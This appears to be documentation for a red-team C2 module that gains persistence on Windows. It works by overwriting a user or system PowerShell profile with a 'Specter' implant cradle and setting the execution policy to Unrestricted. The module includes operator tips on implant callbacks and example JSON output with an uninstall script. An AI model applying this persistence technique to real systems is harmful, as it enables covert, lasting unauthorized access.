Persistence with PowerShell Profile and PowerShell Cradle

Description

Establishes user or system level persistence by creating or overwriting a PowerShell profile and inserting an Specter cradle.

Overview

A PowerShell profile is a script that runs when PowerShell starts. You can use the profile as a logon script to customize the environment, or in our case for persistent access. This script establishes user or system level persistence by creating or overwriting a PowerShell profile and inserting an Specter cradle. The operator can specify either a “User” or “System” profile. The “User” profile corresponds to the Current User, All Hosts profile. The “System” profile corresponds to the All Users, All Hosts profile and requires Administrator privileges to modify.

This script will also set the PowerShell execution policy to Unrestricted for either the current user or local machine depending upon whether or not the user or system profile is selected. Without this setting, the system will not be able to run the profile script.

Arguments

Parameter Type Description
Profile string The PowerShell profile type to use for persistence. The User profile will only run when PowerShell instances are created under the context of the current user.
Build string The Specter build identifier.

Dependencies

  • None

Operating Systems

  • Windows

Pre-Requisites

  • If using the System profile, Current user must be a member of the Administrators group.

Employment Considerations

  • If a lot of scripts are being executed on the target system, the you may flood the C2 server with too many implant callbacks and duplicate sessions. It may be worth building an implant to burnoff if a Specter is already running.

Example Output

[
  {
    "Persistence": {
      "Id": "2ba39fdc872b4f4e9c3635ff1cdc182f",
      "Method": "PowerShell Profile",
      "Trigger": "PowerShell Host Startup",
      "Build": "92cbf1b0f92642859f28f258226cc1f3",
      "Profile": "User",
      "Event": "Create",
      "Success": true,
      "UninstallScript": "",
      "UninstallScript": "try {\r\n\t[System.IO.File]::Delete('C:\\Users\\helpdesk\\Documents\\WindowsPowerShell\\profile.ps1');\r\n\t$success = $true;\r\n} catch {\r\n\t$success = $false;\r\n\tthrow;\r\n}\r\n\r\nNew-Object PSObject -Property @{\r\n\tPersistence = New-Object PSObject -Property @{\r\n\t\tId = \"1724650fe73f4328b127d015631e34e3\";\r\n\t\tEvent = \"Delete\";\r\n\t\tSuccess = $success;\r\n\t    Method = \"PowerShell Profile\";\r\n\t    Profile = \"User\";\r\n\t    Trigger = \"PowerShell Host Startup\";\r\n\t}\r\n}",
      "ProfilePath": "C:\\Users\\helpdesk\\Documents\\WindowsPowerShell\\profile.ps1"
    }
  }
]

References

Scroll to Top